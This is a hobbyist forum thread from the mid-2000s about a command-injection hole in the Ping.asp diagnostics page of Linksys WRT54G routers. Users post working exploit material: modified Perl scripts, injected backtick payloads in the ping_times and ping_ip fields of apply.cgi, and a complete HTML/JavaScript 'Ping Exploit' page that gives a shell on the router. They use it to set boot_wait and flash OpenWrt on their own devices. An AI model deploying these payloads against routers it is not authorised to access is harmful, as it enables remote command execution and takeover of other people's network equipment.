1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WRT54G v2.02.7 & v2.04.3 Ping.asp hack works :)

Discussion in 'Cisco/Linksys Wireless Routers' started by nteusink, Jul 31, 2004.

  1. nteusink

    nteusink Network Guru Member

    I had a couple of problems with Satori, so I decided it would help a lot if I could execute commands on the official firmware so I could check ifconfig etcetera. I came up with the following:
    With the normal ping.asp hack, you enter the command in the ping_ip field, but linksys checks this field in later firmware releases, so command execution is no longer possible there. However, there is another variable you send to the server: ping_times
    this variable can still be used for command injection. in the normal web interface this is a pull-down menu, so you can't directly use that.

    the best way is probably a script (http://www.topfx.com/dist/wrt54gcli.pl) by Mina Naguib, designed to exploit the original ping.asp bug, you just have to change a couple of lines:
    Code:
    $IP       = "";
    $PORT     = "";
    $PASSWORD = "";
    
    Enter the correct values for your router between the quotes

    Code:
    "ping_times"    => "1",
    "ping_ip"       => "`$command >/tmp/ping.log 2>&1`",
    
    change to:
    Code:
    "ping_times"    => "`$command >/tmp/ping.log 2>&1`",
    "ping_ip"       => "127.0.0.1",
    


    now execute the script using Linux perl (or in windows activestate activeperl) and you should have a pseudo telnet interface with your router.

    Another way is to surf to http://192.168.1.1/Ping.asp (assuming 192.168.1.1 is your router ip), save that page and edit it in notepad. Add after
    Code:
    <title>
    the following code:
    Code:
    <base href="http://192.168.100.3/"> 
    Replace:
    Code:
    <SELECT name=ping_times> 
    <OPTION value=5 selected>5</OPTION>
    <OPTION value=10>10</OPTION>
    <OPTION value=0>Unlimited</OPTION></SELECT>
    
    With
    Code:
    <INPUT name=ping_times> 
    
    When you open the new html file you should have an input field for ping_times. Enter
    `ls > /tmp/ping.log`
    and click Ping, you should get a directory listing

    Using a trick very similar to the one described here (the WRT54G Shell part): http://www.seattlewireless.net/~mattw/index.cgi/2003/07/
    I was able to upload a binary file (a MIPS compiled hello world :)) and was able to execute it (hello world!)

    it's 5:35am now, I'll correct any typo's in the morning (well... probably the afternoon ;))

    Cheers,

    Niels
     
  2. sune

    sune Network Guru Member

    Thanks!

    The modified perl script works like a charm :)

    /Sune
     
  3. nteusink

    nteusink Network Guru Member

    and it still works with 2.04.4 :D
     
  4. aputerguy

    aputerguy Network Guru Member

    Not working for me...

    I tried using the script from; http://www.topfx.com/dist/wrt54gcli.pl
    but I keep getting the error message:

    "Failed to talk to http://192.168.1.1:80/apply.cgi: 500 Can't read entity body: Connection reset by peer"


    I then tried to isolate the problem by constructing the following 3 perl scripts.

    1. Simplest version where everything encoded in the URI [WORKS]

    #! /usr/bin/perl

    use strict;
    use LWP::UserAgent;

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    my $uri="http://192.168.1.1/apply.cgi?submit_button=Ping&submit_type=start&action=Ap\ply&change_action=gozila_cgi&ping_ip=%60ls+-al+%2Fvar+%3E+%2Ftmp%2Fping.log+2%3\E%261%60&ping_times=5";

    my $req = HTTP::Request->new(GET => $uri);

    $req->authorization_basic("",$passwd);
    my $res = $ua->request($req);

    # check the outcome
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }


    2. Stripped down version analogous to the original script [FAILS]
    #! /usr/bin/perl

    use strict;
    use LWP::UserAgent;
    use HTTP::Request::Common qw(POST);

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    my $uri = "http://192.168.1.1/apply.cgi";
    my $req = POST $uri,
    [
    "submit_button" => "Ping",
    "submit_type" => "start",
    "action" => "Apply",
    "change_action" => "gozila_cgi",
    "ping_ip" => "`ls -al /var > /tmp/ping.log 2>&1`",
    "ping_times" => "5",
    ];

    $req->authorization_basic("",$passwd);
    my $res = $ua->request($req);

    # check the outcome
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }

    Result is:
    First time it runs, I get back no output (i.e. success but status line is: 200 EOF)
    Second time it runs, I get an error:
    Error: 500 Can't read entity body: Connection reset by peer

    3. Similar version but using GET

    #! /usr/bin/perl

    use strict;
    use LWP::UserAgent;

    my $passwd = "mypassword";
    my $ua = LWP::UserAgent->new;

    my $uri="http://192.168.1.1/apply.cgi";

    my $req = HTTP::Request->new(GET => $uri);
    $req->content("submit_button=Ping&submit_type=start&action=Apply&change_action=\gozila_cgi&ping_ip=%60ls+-al+%2Fvar+%3E+%2Ftmp%2Fping.log+2%3E%261%60&ping_time\s=5");
    $req->authorization_basic("",$passwd);
    my $res = $ua->request($req);

    # check the outcome
    if ($res->is_success) {
    my $string = $res->content;
    $string =~ s/.*var table = new Array\(\n//s;
    $string =~ s/.*"(.*)"/$1/g;
    $string =~ s/\n\);\W*var i = 0;.*//s;
    print $string;
    } else {
    print "Error: " . $res->status_line . "\n";
    }

    Again, result is:
    First time it runs, I get back no output (i.e. success but status line is: 200 EOF)
    Second time it runs, I get an error:
    Error: 500 Can't read entity body: Connection reset by peer
     
  5. wardini

    wardini Network Guru Member

    ping hack

    OK. Thanks for the help. I got the perl script to work with my new WRT54G version 2.0, Firmware Version v2.02.7

    But I still have a question. How do I perform the original set boot_wait command?

    I am trying to verify that the commands work first and I cannot get the show command to work.

    I do not understand why the original command had all of the */n characters. I tried just "show" and got nothing. I tried lots of variations including the ${IFS} stuff but I don't get anything.

    ls, and ps, and cat seem to work so I think I'm set up to do everything.

    Thanks for your help.
    Wardini
     
  6. wardini

    wardini Network Guru Member

    figured it out

    OK. I figured it out. I now know what *n/*n/ means. I think I realize that this was due to a limitation in command line length from the beginning. But I saw those instructions in about 5 places in searches and noone ever explained what that was all about.

    Anyway, I now have my boot_wait variable set to on using the perl script and the changes suggested in the original post. It looks like it will work for me and I didn't have to go back to an old version of the firmware.

    Wardini
     
  7. kinemax

    kinemax Network Guru Member

    What does the code <base href="http://192.168.100.3/"> do?
     
  8. kinemax

    kinemax Network Guru Member

    I got the perl script working (opening the cli).

    What are the commands I need to enter to enable the boot_wait?
     
  9. kinemax

    kinemax Network Guru Member

    I found out that the Linksys firmware version 2.04.4 still has the Ping.asp loop-hole and thus I was able to set boot_wait without resorting to the work-around above.
     
  10. jippers

    jippers Network Guru Member

    I have the perl cli working, although i'm having problems running
    Code:
    /usr/sbin/wl -i eth2 txpwr 84
    All that happens is wl spits out the help text to my terminal. A prior post mentions something about the */n and extra long commands, but not how to use them in the script. Can someone shed some light?

    Thanks,

    John

    EDIT: I am using fimrware 2.02.2. Also, if i run the above command wiht eth1, it seems to exectute the command properly, that is it prints nothing ot the terminal. Is that what I should expect? If so, should it be eth1 and not eth2?
     
  11. jippers

    jippers Network Guru Member

    Ahhhh...

    So to change the txpower you don't need teh whole -i ethx in the arguments. A simple /usr/bin/wl txpwr will return the current setting of the txpwr (0 to 255) and /usr/bin/wl txpwr XXX will set the txpwr.

    Whoo hoo!
     
  12. graz

    graz Guest

    firmware v3.03.6

    hi to all
    we are looking for an outboud proxy for our sip phones. i read that WRT54G could be the solution, but ... i upgraded to the latest firmware version (Firmware Version: v3.03.6 ) and it doesn't work.
    i tried all the tricks explained here to modify boot_wait (i wanted to install openwrt), but no success.
    any suggestion?
    thnx to all
     
  13. immauss

    immauss Guest

    OK, I couldn't actually find anywhere how to enable the boot_wait with the fake CLI, in v2.04.4 firmware and V2 Hardware, so I hacked at it until I got it. Here's how ....

    from the CLI;

    set the boot wait to on with;
    Code:
    /usr/sbin/nvram set boot_wait=on
    
    Commit the setting to the NVRAM with;
    Code:
    /usr/sbin/nvram commit
    
    reboot or power cycle

    Make sure it took;
    Code:
    /usr/sbin/nvram get boot_wait
    
    
    if all is well, the last command will simply return "on"

    For some reason, after some comands, the CLI stops returning info. You just get a blank line. (well I do.) Everytime it does that, I have to reboot to get it to return anything again (even on an ls / ). This however does not seem to effect the fact that the commmand is run, because both of the first two nvram commands returned nothing , but upon reboot, the boot_wait was set on.
     
  14. chuleta7

    chuleta7 Network Guru Member

    Ok. So it means that if I recently upgrade firmware to 3.03.6, I don´t have the option to hack the tx power of WRT54G?
     
  15. Paco_2345

    Paco_2345 Guest

    Success with Firmware v4.20.7, Aug. 18, 2005.

    I had to use the "ping_times" method, and,
    the device insisted to have something on the
    "internet" port. It doesent work with the "internet" port
    disconnected.

    i did use a simple html file for the access:
    ------------------------------------------------
    <HTML><BODY>

    <FORM action=http://192.168.1.1/apply.cgi method=post name=ping>
    <INPUT name=submit_type type=hidden value=start>
    <INPUT name=action type=hidden value=Apply>
    <INPUT name=change_action type=hidden value=gozila_cgi>

    <CENTER>

    <INPUT maxLength=31 name=ping_ip size=31 value="192.168.1.3">


    <INPUT maxLength=128 name=ping_times size=128 value="` >/tmp/ping.log 2>&1` ">


    <INPUT name=submit_button type=submit value=Ping>

    </FORM>
    </BODY></HTML>
    ------------------------------------------------

    enter the command in between the ` and the >/
    and press "ping".
     
  16. wildgift

    wildgift Guest

    success on 4.20.6

    hardware: 4.0
    firmware: 4.20.6

    A variation on the above by paco worked. I used the source from the router. I had the base href set to 192.168.1.1 (so the js files would load). Commented out the line of code in init(). (I suspct paco's way is better.)

    After each command, I clicked the back button and entered the next command. Note that each command is wrapped in backticks.

    `/usr/sbin/nvram set boot_wait=on`
    `/usr/sbin/nvram commit`
    `/usr/sbin/nvram get boot_wait > /tmp/ping.log`

    The last command returns "yes".

    Thanks everyone!
     
  17. robertmena

    robertmena Guest

    Tips for 4.20.6 and Hardware version 3.0?

    Hi, I've read the http://wiki.openwrt.org/OpenWrtDocs/Installing and this forum but still can't install the image for openwrt.

    Any tips regarding my setup ?

    4.20.6 and Hardware version 3.0
     
  18. Uranium235

    Uranium235 Guest

    Ping Exploit in HTML(/JS)

    Try this...

    Log into your router's webinterface first for authorization (any/first page will do).
    Cut and Paste the below into a new .HTM-File and open it in your Browser.

    H/W V 2.0
    Firmware V 4.20.8 ETSI

    Uranium235

    ----- Snip -----
    <HTML>
    <HEAD>
    <TITLE>Linksys WRT54G Ping Exploit</TITLE>
    <META name="author" content="Uranium235">
    </HEAD>
    <SCRIPT language="javascript">
    //<!--
    function cmd_submit(F)
    {
    F.action = "http://" + F.ping_ip.value + "/apply.cgi";
    if (F.submit_button.value != "Ping")
    {
    F.submit_button.value = "Ping";
    F.ping_times.value = "`" + F.ping_times.value + " >/tmp/ping.log`";
    }
    return true;
    }
    function cmd_reset(F)
    {
    F.ping_times.value = "";
    F.submit_button.value = "Send";
    window.frames.response.location.href = "about:blank"
    return true;
    }
    function cmd_bootwon(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram set boot_wait=on";
    return true;
    }
    function cmd_nvcommit(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram commit";
    return true;
    }
    function cmd_bwget(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram get boot_wait";
    return true;
    }
    function cmd_nvshow(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram show";
    return true;
    }
    //-->
    </SCRIPT>
    <BODY onLoad="cmd_reset(document.forms.ping);">
    <H2>Linksys WRT54G Ping Exploit</H2>
    <H4>Type in any command as if you were typing at a local shell (with JS)

    Piping commands is possible (e.g. cd sbin|ls)

    IP is your router's IP-Address (Default: 192.168.1.1)</H4>
    <FORM name="ping" action="http://192.168.1.1/apply.cgi" method="post" target="response" onSubmit="cmd_submit(this);return true;">

    <INPUT name="submit_type" type="hidden" value="start">
    <INPUT name="change_action" type="hidden" value="gozila_cgi">
    IP:
    <INPUT name="ping_ip" maxlength=15 size=15 value="192.168.1.1" onFocus="this.select();">
    <INPUT name="ping_times" maxlength=128 size=50 value="" onFocus="this.select();">
    <INPUT name="submit_button" type="submit" value="Ping">
    </FORM>
    <INPUT name="btn_reset" type="button" value="Reset" onClick="cmd_reset(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Set boot_wait ON" onClick="cmd_bootwon(document.forms.ping);">
    <INPUT name="btn_nvcommit" type="button" value="Commit NVRAM" onClick="cmd_nvcommit(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Get boot_wait" onClick="cmd_bwget(document.forms.ping);">
    <INPUT name="btn_nvshow" type="button" value="Show NVRAM" onClick="cmd_nvshow(document.forms.ping);">




    <IFRAME name="response" src="about:blank" width="525" height="300" frameborder="1"></IFRAME>
    </BODY>
    </HTML>
    ----- Snip -----
     
  19. Aq_lynch

    Aq_lynch Network Guru Member

    lol

    :drinking:
     
  20. beakmyn

    beakmyn Network Guru Member

    Re: Ping Exploit in HTML(/JS)

    Using "Uranium235" HTML exploit

    WRT54GS CGN5
    Firmware: 4.70.6

    Worked flawlessly using the following setup

    Default Factory config
    WAN port connected with a valid DHCP address
     
  21. itsmeohmy

    itsmeohmy Network Guru Member

    enabling boot_wait not working

    Hmm, I can't seem to get boot_wait enabled. My client Pc is in port 1 of the WRT, it has a valid WAN address (DHCP from my cable modem), and was reset to the factory default settings.

    I have tried what is described in the OpenWRT wiki, I've tried Paco_2345's and wildgift's code, and Uranium235's Javascript code from this thread.

    When I try to enter the commands through the Administration-Diagnostics-Ping menu in the router's web interface the commands I enter are truncated after 31 characters, so that won't work either.

    Firmware Version : v1.05.3, Sep. 22, 2005
    Router Name : WRT54GSV4

    Anybody got any ideas?

    Dave
     
  22. wjlee1204

    wjlee1204 Guest

    Help me please !!

    Hi everyone ..

    I have WRT54G v4.0(Firmware: 4.20.7)

    I tried all the methods explained here to modify boot_wait (i wanted to install openwrt), but I failed...
    thus I want to downgrade firmeware(4.20.6 or below). but I can't take 4.20.6 or lower version. Only v4.20.7 in linksys hompage.

    Where can I get v4.20.6 or lower version firmware?
    or How can I solve this problem in my system condition(v4.0 fireware 4.20.7)?

    thank to all ..
     
  23. Cytomax

    Cytomax Network Guru Member

    EDIT : If there is ANYTHING i am missing please let me know.
    I dont know if i am supposed to click on the button "Commit NVRAM" at the end of Step-5 to save the work can somebody please reply with an answer.

    I thought it would be nice to have a formal guide on how to execute the ping hack. I just wanted to make it easier for everyone else that ever needs to do this. If anyone sees any mistakes or wants to add anything please let me know.

    This worked on a
    WRT54GS
    Version: 4
    Firmware: 1.05.0

    Step-1
    Copy and paste the code into notepad and name the file
    Uranium235 Linksys WRT54G Ping Exploit.html
    save the file to your desktop

    Code:
    <HTML>
    <HEAD>
    <TITLE>Linksys WRT54G Ping Exploit</TITLE>
    <META name="author" content="Uranium235">
    </HEAD>
    <SCRIPT language="javascript">
    //<!--
    function cmd_submit(F)
    {
    F.action = "http://" + F.ping_ip.value + "/apply.cgi";
    if (F.submit_button.value != "Ping")
    {
    F.submit_button.value = "Ping";
    F.ping_times.value = "`" + F.ping_times.value + " >/tmp/ping.log`";
    }
    return true;
    }
    function cmd_reset(F)
    {
    F.ping_times.value = "";
    F.submit_button.value = "Send";
    window.frames.response.location.href = "about:blank"
    return true;
    }
    function cmd_bootwon(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram set boot_wait=on";
    return true;
    }
    function cmd_nvcommit(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram commit";
    return true;
    }
    function cmd_bwget(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram get boot_wait";
    return true;
    }
    function cmd_nvshow(F)
    {
    cmd_reset(F);
    F.ping_times.value = "/usr/sbin/nvram show";
    return true;
    }
    //-->
    </SCRIPT>
    <BODY onLoad="cmd_reset(document.forms.ping);">
    <H2>Linksys WRT54G Ping Exploit</H2>
    <H4>Type in any command as if you were typing at a local shell (with JS)
    
    Piping commands is possible (e.g. cd sbin|ls)
    
    IP is your router's IP-Address (Default: 192.168.1.1)</H4>
    <FORM name="ping" action="http://192.168.1.1/apply.cgi" method="post" target="response" onSubmit="cmd_submit(this);return true;">
    
    <INPUT name="submit_type" type="hidden" value="start">
    <INPUT name="change_action" type="hidden" value="gozila_cgi">
    IP:
    <INPUT name="ping_ip" maxlength=15 size=15 value="192.168.1.1" onFocus="this.select();">
    <INPUT name="ping_times" maxlength=128 size=50 value="" onFocus="this.select();">
    <INPUT name="submit_button" type="submit" value="Ping">
    </FORM>
    <INPUT name="btn_reset" type="button" value="Reset" onClick="cmd_reset(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Set boot_wait ON" onClick="cmd_bootwon(document.forms.ping);">
    <INPUT name="btn_nvcommit" type="button" value="Commit NVRAM" onClick="cmd_nvcommit(document.forms.ping);">
    <INPUT name="btn_bootwon" type="button" value="Get boot_wait" onClick="cmd_bwget(document.forms.ping);">
    <INPUT name="btn_nvshow" type="button" value="Show NVRAM" onClick="cmd_nvshow(document.forms.ping);">
    
    
    
    
    <IFRAME name="response" src="about:blank" width="525" height="300" frameborder="1"></IFRAME>
    </BODY>
    </HTML>
    
    Step-2
    Make sure you have a valid WAN IP
    What i did and it should work for everyone is
    Internet Connection Type: Static
    IP Address: 11.11.11.11
    Subnet Mask: 255.255.255.0
    Default Gateway: 11.11.11.1
    DNS: 205.152.144.23

    Step-3
    Go to your Desktop and click on
    Uranium235 Linksys WRT54G Ping Exploit.html

    Step-4
    Click on the button that says
    Set boot_wait ON
    The button that said "Ping" now changes to "Send"
    Click on the button that says "Send"
    Wait a few seconds for the screen to refresh

    Step-5
    Click on the button that says
    Get boot_wait
    The button that said "Ping" now changes to "Send"
    Click on the button that says "Send"
    Wait a few seconds for the screen to refresh
    You should now see the word "on"

    You are finished!!

    Thanks in Advance
    Eddie
     
  24. Craven

    Craven Network Guru Member

    Using "Uranium235" HTML exploit

    WRT54GS CGN4
    Firmware: 4.70.6

    Worked flawlessly using the following setup

    Default Factory config with a few minor changes such as a non-default IP address (192.168.2.30) and DHCP disabled (my LAN subnet is 192.168.2.0/24 with another active DHCP server).
    WAN port unconnected with a fake static IP address.

    Re-boot router. Select "set boot_wait on" and press 'Send'.
    After inner screen refreshes quickly scroll to the bottom right and press "Stop".

    Re-boot router again. Select "show nvram" and press 'Send'.
    Confirm boot-wait=on

    Sweet! :thumb:
     
  25. Infoly

    Infoly Guest

    Problem of installation of a new firmware.

    I have a router CISCO-Linksys WRT54GL, S/N CL7B1G....
    To develop a specific application on this system I wish to replace the firmware of origin Linksys v4.30.7, Jun. 20, 2006 by an Open firmware (OpenWrt, DD-WRT... I did not make the choice yet).
    Having read the many accessible literature on Internet, I read that it was preferable to put the Wait Boot at ON.
    To be able to do that it is necessary to have access to the machine and I do not arrive there.
    - The Access Web http://192.168.1.1 functions and access to the menu of configuration gives me.
    - And amongst other things in the page allowing charging a new firmware (what I do not want to do before to have put the Wait Boot at ONE).
    - In console the order ping 192.168.1.1 functions.
    - Connection tftp 192.168.1.1 functions.

    On the other hand not average to use Linksys WRT54G Ping Exploit to make a Set Boot_Wait ONE. None the orders functions, even not simple Ping! The answer is always same Network is unreachebable.

    Somebody can it say to me if there is an operational means to put the Wait Boot at ONE on CISCO-Linksys WRT54GL S/N CL7B1G.... firmware v4.30.7, Jun. 20, 2006.

    Thank you to also give me your experiment to help me to choose a firmware for:
    - An elementary application.
    - An application implementing Internet and WiFi (I use a Modem Router D-Link DSL-G624T, who is accessible without any problem).
    Thank in advance
     

Share This Page